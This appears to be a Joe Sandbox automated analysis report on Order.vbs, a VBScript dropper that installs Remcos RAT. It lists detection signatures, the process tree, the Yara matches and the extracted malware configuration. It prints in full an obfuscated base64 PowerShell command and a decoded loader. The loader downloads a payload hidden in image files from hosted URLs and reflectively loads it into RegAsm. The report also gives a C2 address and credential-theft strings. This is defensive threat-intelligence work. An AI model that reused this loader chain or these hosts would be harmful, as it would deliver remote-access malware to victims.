Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order.vbs

Overview

General Information

Sample name:Order.vbs
Analysis ID:1538690
MD5:56815d5ebf721c3782ecbc8b415f1c0a
SHA1:4bc177cad4a63528f271a3578a12418f96123f69
SHA256:857cc9b2e6ba71e001ff2039a1d3a795e54a8cb99df9362b6ebc255de7aaaad4
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2420 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#GQ#cgBt#G0#c#Bn#Gs#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GI#c#Bh#Hk#awBz#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 7436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7780 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["154.216.17.141:5922:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MBKA6A", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x59738:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x59c48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x59618:$str_b2: Executing file:
      • 0x5a01c:$str_b3: GetDirectListeningPort
      • 0x59a38:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x59bb8:$str_b7: \update.vbs
      • 0x59644:$str_b9: Downloaded file:
      • 0x59630:$str_b10: Downloading file:
      • 0x596d4:$str_b12: Failed to upload file:
      • 0x59fe4:$str_b13: StartForward
      • 0x5a004:$str_b14: StopForward
      • 0x59b10:$str_b15: fso.DeleteFile "
      • 0x59aa4:$str_b16: On Error Resume Next
      • 0x59b40:$str_b17: fso.DeleteFolder "
      • 0x596c4:$str_b18: Uploaded file:
      • 0x59684:$str_b19: Unable to delete:
      • 0x59ad8:$str_b20: while fso.FileExists("
      • 0x59871:$str_c0: [Firefox StoredLogins not found]
      • 0x597a5:$str_c2: [Chrome StoredLogins found, cleared!]
      • 0x59781:$str_c3: [Chrome StoredLogins not found]
      • 0x59898:$str_c6: \logins.json
      Process Memory Space: powershell.exe PID: 1880JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 1880INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x2ee8e:$b2: ::FromBase64String(
        • 0x151370:$b2: ::FromBase64String(
        • 0x2eca8:$b3: ::UTF8.GetString(
        • 0x151181:$b3: ::UTF8.GetString(
        • 0x11c6b8:$s1: -join
        • 0x13fee4:$s1: -join
        • 0x43bb4:$s3: reverse
        • 0x4f4ae:$s3: reverse
        • 0x7320e:$s3: reverse
        • 0x7d0d5:$s3: reverse
        • 0xaca00:$s3: reverse
        • 0xaccee:$s3: reverse
        • 0xad408:$s3: reverse
        • 0xadbc1:$s3: reverse
        • 0xb4d5c:$s3: reverse
        • 0xb5176:$s3: reverse
        • 0xb5cfe:$s3: reverse
        • 0xb69ab:$s3: reverse
        • 0xf8bf2:$s3: reverse
        • 0xff831:$s3: reverse
        • 0x10187b:$s3: reverse
        Click to see the 3 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          8.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x58338:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x58848:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x58218:$str_b2: Executing file:
          • 0x58c1c:$str_b3: GetDirectListeningPort
          • 0x58638:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x587b8:$str_b7: \update.vbs
          • 0x58244:$str_b9: Downloaded file:
          • 0x58230:$str_b10: Downloading file:
          • 0x582d4:$str_b12: Failed to upload file:
          • 0x58be4:$str_b13: StartForward
          • 0x58c04:$str_b14: StopForward
          • 0x58710:$str_b15: fso.DeleteFile "
          • 0x586a4:$str_b16: On Error Resume Next
          • 0x58740:$str_b17: fso.DeleteFolder "
          • 0x582c4:$str_b18: Uploaded file:
          • 0x58284:$str_b19: Unable to delete:
          • 0x586d8:$str_b20: while fso.FileExists("
          • 0x58471:$str_c0: [Firefox StoredLogins not found]
          • 0x583a5:$str_c2: [Chrome StoredLogins found, cleared!]
          • 0x58381:$str_c3: [Chrome StoredLogins not found]
          • 0x58498:$str_c6: \logins.json
          8.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            8.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x59738:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x59c48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x59618:$str_b2: Executing file:
            • 0x5a01c:$str_b3: GetDirectListeningPort
            • 0x59a38:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x59bb8:$str_b7: \update.vbs
            • 0x59644:$str_b9: Downloaded file:
            • 0x59630:$str_b10: Downloading file:
            • 0x596d4:$str_b12: Failed to upload file:
            • 0x59fe4:$str_b13: StartForward
            • 0x5a004:$str_b14: StopForward
            • 0x59b10:$str_b15: fso.DeleteFile "
            • 0x59aa4:$str_b16: On Error Resume Next
            • 0x59b40:$str_b17: fso.DeleteFolder "
            • 0x596c4:$str_b18: Uploaded file:
            • 0x59684:$str_b19: Unable to delete:
            • 0x59ad8:$str_b20: while fso.FileExists("
            • 0x59871:$str_c0: [Firefox StoredLogins not found]
            • 0x597a5:$str_c2: [Chrome StoredLogins found, cleared!]
            • 0x59781:$str_c3: [Chrome StoredLogins not found]
            • 0x59898:$str_c6: \logins.json

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_1812.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              Sigma Signatures

              Spreading

              barindex
              Sigma detected: Powershell download payload from hardcoded c2 list
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgB